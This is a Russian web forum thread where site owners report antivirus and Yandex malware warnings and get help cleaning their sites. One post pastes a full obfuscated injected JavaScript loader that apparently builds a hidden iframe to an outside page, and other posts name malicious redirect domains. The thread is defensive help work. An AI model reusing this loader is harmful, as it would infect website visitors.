Проверить сайт на наличие вирусов, все просьбы о проверке оставляйте в этой теме

[Efim]

Да, нет пока все вроде нормально, сюда написал что бы проверили на всякий случай, поскольку проверив комп все оказалось нормально.

 

[dkzfiles]

Привет!
Люди добрые, помогите разобраться. Яндекс кричит про вредоносный код. Все файлы сайта хттп://loadboard.ru проверены и каспером и drweb и avast и sophos и mcafee. Все чисто. Сегодня код найден, завтра нет. Скрипт следующего содержания:

Спойлер

<script>function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};createCSS('#c0','background:url(data:,eval)');var wij=null;var r=document.styleSheets;for(var i=0;i<r.length;i++){try{var bauu=r.cssRules||r.rules;for(var bpio=0;bpio<bauu.length;bpio++){var urnz=bauu.item?bauu.item(bpio):bauu[bpio];if(!urnz.selectorText.match(/#c(\d+)/))continue;wij=urnz.style.backgroundImage.match(/url\("?data\:[^,]*,([^")]+)"?\)/)[1];};}catch(e){};} puny=new Date(2010,11,3,2,21,4);t=puny.getSeconds();var rpzc=[36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,392/t,400/t,484/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,136/t,392/t,444/t,400/t,484/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,464/t,456/t,484/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,392/t,400/t,484/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,396/t,388/t,464/t,396/t,416/t,128/t,160/t,404/t,164/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,392/t,444/t,400/t,484/t,128/t,244/t,128/t,392/t,400/t,484/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,40t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,476/t,456/t,420/t,464/t,404/t,160/t,136/t,240/t,420/t,408/t,456/4/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,388/t,436/t,404/t,128/t,460/t,456/t,396/t,244/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,448/t,420/t,396/t,416/t,404/t,464/t,388/t,184/t,440/t,404/t,464/t,188/t,412/t,456/t,404/t,404/t,440/t,184/t,448/t,416/t,448/t,156/t,128/t,476/t,420/t,400/t,464/t,416/t,244/t,156/t,196/t,192/t,156/t,128/t,416/t,404/t,420/t,412/t,416/t,464/t,244/t,156/t,196/t,192/t,156/t,128/t,460/t,464/t,484/t,432/t,404/t,244/t,156/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,232/t,416/t,420/t,400/t,400/t,404/t,440/t,236/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,232/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,236/t,432/t,404/t,408/t,464/t,232/t,192/t,236/t,464/t,444/t,448/t,232/t,192/t,236/t,156/t,248/t,240/t,188/t,420/t,408/t,456/t,388/t,436/t,404/t,248/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,500/t,52/t,36/t,36/t,408/t,468/t,440/t,396/t,464/t,420/t,444/t,440/t,128/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,408/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,156/t,420/t,408/t,456/t,388/t,436/t,404/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,460/t,456/t,396/t,156/t,176/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,448/t,420/t,396/t,416/t,404/t,464/t,388/t,184/t,440/t,404/t,464/t,188/t,412/t,456/t,404/t,404/t,440/t,184/t,448/t,416/t,448/t,156/t,164/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,244/t,156/t,416/t,420/t,400/t,400/t,404/t,440/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,244/t,156/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,432/t,404/t,408/t,464/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,464/t,444/t,448/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,476/t,420/t,400/t,464/t,416/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,416/t,404/t,420/t,412/t,416/t,464/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,52/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,408/t,164/t,236/t,52/t,36/t,36/t,500/t];var mw="";ukxy=function(){return{e:eval}}().e;qf=ukxy(wij);var mv='';var phm="fro"+puny.getSeconds()+"arCode";phm=phm.replace(4,"mCh");hx=String[phm];for(var i=0;i<rpzc.length;i++){nqwy=qf(rpzc);hx.call(nqwy);mv+=hx(nqwy);} qf(mv);</script> </body> </html>

Спасибо.

 

[Arbitr]

если не ошибаюсь ругается на кусок из кода идущий с рекламой игры.. скопируйте плиз код из файла scripts/ads папка ads
то есть не папка скрипт вашей cms joomla а именно то что пришло с рекламой

 

[dkzfiles]

прошу прощения за безграмотность, как это можно сделать? через FTP или firebug? и если возможно подробнее.. если через firebug, интуиция подсказывает, что копать нужно в этом направлении?[

 

[Arbitr]

да, как понимаю айс код туда инклудится банер..и по ходу траблики с ним..
плюс там заметил странную картинку 12 пикселов белый квадрат *** i.png

 

[dkzfiles]

наткнулся на статью про Trojan-Downloader.HTML.Agent.wy, он же Troj/Iframe-IW здесь: хттп://www.mpcontrol.ru/index.php?option=com_content&view=article&id=72%3A-xmega-&catid=1&Itemid=36
По рекомендации открыл и сравнил с оригиналом файл \libraries\joomla\utilities\compat\compat.php
Он явно отличался. Перезаписал оригиналом, жду от яндекса новостей, потом отпишу помогло или нет.

 

[Arbitr]

да оно.. не забудьте сменить пароль и проверить комп на вируса..

 

[Гумер]

Добрый день.

В последнее время хттп://colorandcode.ru начал блокироваться.

При проверке выдает

Avast JS:ScriptIP-inf [Trj]
GData JS:ScriptIP-inf
Ikarus JS.ScriptIP

а остальные показывают что нет вируса, например
ESET-NOD32 вирусов нет

 

[Sandor]

а остальные показывают что нет вируса

Касперский и WOT тоже блокируют.

 

[dkzfiles]

Arbitr, через 3 суток сайт выплыл в яндексе без пометок, вот уже неделя все нормально, причина была в compat.php. Пароли сменил с параноидальной длиной, поставил компонент против sql инъекций и всяких других хреней. Поймать бы того кто это сделал да и отрубить голову.

 

[akok]

dkzfiles, это делал скорее всего скрипт. Ручным взломом занимаются или дети безголовые по инструкции либо под заказ за большие деньги.

 

[Кирилл]

В разделе вин 7 была выложена ссылка на victоria, хттп://hdd-911.com/index.php?option=content&task=view&id=27&Itemid=27
Когда перехожу с компа по ссылке то все нормально.
Если с планшетника то сразу срабатывает перенаправление,ставлю антивирь выдает как малварьный ресурс.
При перенаправлении идет предложение все скачать,все обновить...
перенаправление на h t t p://bq-update.com/

На планшете вирья вроде нет-сканировал раными утилами,смотрел потроха системы и процессы,ничего подозрительного+проблема только на том сайте.
картинки прилагаю

 

[shestale]

Проверь хотя бы хостс, т.к. сылка нормальная, и проблема имхо у тебя на планшетнике.

 

[Кирилл]

shestale, тут на анроиде нет хостса.
это не шиндос
с другими сайтами все нормально,проблема только с этим.

Добавлено через 35 минут 47 секунд
по описаниям эта штука атакует сайты и внедряет J2ME/TrojanSMS.Agent.DL через мобильные браузеры.

 

[akok]

Сайт заражен.

Есть два варианта:
1. Админ зарабатывает на мобильном трафике
2. Сайт взломан и перенаправляет все мобильные устройства на вредоносный сайт. Смотреть .htaccess нужно.

 

[Кирилл]

щас гляну.
Сайт временно исключать из публикуемых ссылок?

Добавлено через 8 минут 16 секунд

Смотреть .htaccess нужно.

щас гляну.

.htaccess перепутал с андройдовскими файлами.
кстати вирье искать несложно-в системе не так уж и много файлов,левые сразу видно.

 

[akok]

Исключай. Я не нашел контакты админа того сайта....

Добавлено через 22 секунды
Кстати самое важное можно у нас зазеркалить.

 

[regist]

Исключай. Я не нашел контакты админа того сайта....

странно прям по ссылке

Сергей Казанский.
http://hdd-911.com/
E-Mail: info@hdd-911.com
onehalf@pisem.net
ICQ: 311499112

 

[akok]

может резалка срезала.

Вижу

Вас обслужат лучше проститутки. | Индивидуалки проститутки Питера и СПб.

но контактов не вижу

Добавлено через 16 минут 40 секунд
http://datarecovery.deal.by/contacts

 

[S10]

Приветствую!
Подскажите, пожалуйста, как решить данную проблему:
На поддомене моего сайта обнаружен вирус, который идентифицируется Авастом как JS: cluder [trj]. Яндекс также прислал письмо о наличии вредоносного кода на этом поддомене.

Поддомен:
хттп://tournament.rhl-mod.ru

Заранее благодарю!